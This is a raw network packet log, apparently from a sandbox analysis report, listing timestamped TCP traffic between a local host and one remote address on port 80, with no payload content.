                                          Dec 13, 2024 06:12:58.785309076 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.785341978 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.786144018 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.786199093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.786246061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.786289930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.787000895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.787065029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.787105083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.787149906 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.787861109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.787910938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.787977934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.788027048 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.788738012 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.788803101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.788903952 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.788950920 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.789591074 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.789658070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.789700985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.789747953 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.790440083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.790488958 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.846050024 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.846065998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.846107960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.846142054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.846328974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.846376896 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.846378088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.846427917 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.847188950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.847238064 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.847280025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.847343922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.848051071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.848104954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.848167896 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.848216057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.848917961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.848963976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.849029064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.849073887 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.849802971 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.849845886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.849888086 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.849932909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.850656986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.850712061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.850755930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.850795984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.851537943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.851589918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.851659060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.851701021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.852411985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.852468967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.852668047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.852710962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.853280067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.853322029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.853357077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.853395939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.854151964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.854198933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.854305029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.854347944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855026960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.855078936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855130911 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.855170012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855895996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.855943918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855993986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.856043100 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.856759071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.856839895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882045984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882091999 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882106066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882138968 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882339001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882375002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882390022 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882417917 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.883162022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.883213043 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.883249998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.883295059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.884047985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.884093046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.884104967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.884150982 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.884938955 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.884989023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.885029078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.885076046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.885804892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.885854006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.885914087 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.885961056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.886672974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.886722088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.886765003 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.886817932 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.887511969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.887559891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.887607098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.887660027 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.888390064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.888461113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.888500929 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.888567924 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.889278889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.889318943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.889327049 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.889363050 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.924794912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.924854994 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.924911022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.924958944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.925228119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.925276041 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.925338030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.925385952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.926130056 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.926177025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.926219940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.926266909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.926949978 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.926999092 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960035086 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960045099 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960139990 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960223913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960223913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960223913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960302114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960356951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.961072922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.961127043 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.961214066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.961261034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.961924076 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962018013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962055922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.962055922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.962747097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962798119 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.962843895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962891102 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.963604927 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.963656902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.963710070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.963757038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.964502096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.964551926 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.964643002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.964692116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.965359926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.965409040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.965472937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.965518951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.966233015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.966279984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.966351986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.966397047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.967087030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.967140913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.967185020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.967238903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.967947006 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.967999935 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.968060970 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.968122005 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.968847036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.968898058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.968935966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.969005108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.969697952 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.969750881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.969794989 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.969842911 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.970572948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.970630884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.970673084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.970721006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.971450090 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.971507072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.971518040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.971571922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.972343922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.972395897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.972448111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.972517967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.973191023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.973275900 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.973311901 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.973362923 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.974076986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.974128962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.974168062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.974226952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.974945068 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.974992990 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.975042105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.975092888 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.975831032 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.975874901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.975967884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.976028919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.976706028 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.976751089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.976821899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.976867914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.977550983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.977596045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.977667093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.977715015 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.978444099 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.978492975 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.978524923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.978574038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.979391098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.979469061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.979506969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.979557037 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.980185032 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.980242014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.980319977 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.980369091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.981055975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.981107950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.981151104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.981198072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.981915951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.981977940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.982068062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.982115984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.037946939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038033962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038127899 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.038127899 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.038139105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038230896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.038259983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038314104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039067984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.039117098 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039338112 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.039386988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039901972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.039952993 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039989948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.040038109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.040745020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.040793896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.040832043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.040879011 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.041611910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.041660070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.041685104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.041729927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.042474985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.042582035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.042658091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.043343067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.043397903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.043433905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.043517113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.044197083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.044255972 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.044297934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.045077085 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.045133114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.045190096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.045960903 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046004057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.046042919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046504021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.046835899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046945095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046988964 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.047698975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.047811031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.047863960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.048547983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.048597097 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.073992968 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074073076 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074204922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.074206114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.074354887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074395895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074404955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.074436903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.075236082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.075285912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.075366974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.075417995 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.076133013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.076200962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.076242924 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.076961994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077011108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.077085972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077851057 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077886105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077898979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.077929974 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.078716993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.078829050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.078872919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.079600096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.079675913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.079788923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.079843044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.080471039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.080521107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.080584049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.080630064 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.081326008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.081373930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.081413031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.081459045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.117065907 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.117202044 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.117212057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.117238998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.117362022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.117413044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.117444038 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.117535114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.118237972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.118350029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.118381023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.118393898 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.119056940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.119143009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.152062893 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.152143955 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.152252913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.152343035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.152442932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.152498007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.152616024 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.152668953 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.153294086 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.153350115 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.153626919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.153681040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.153744936 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.153806925 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.154495001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.154550076 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.154593945 CET804978680.82.65.70192.168.2.5
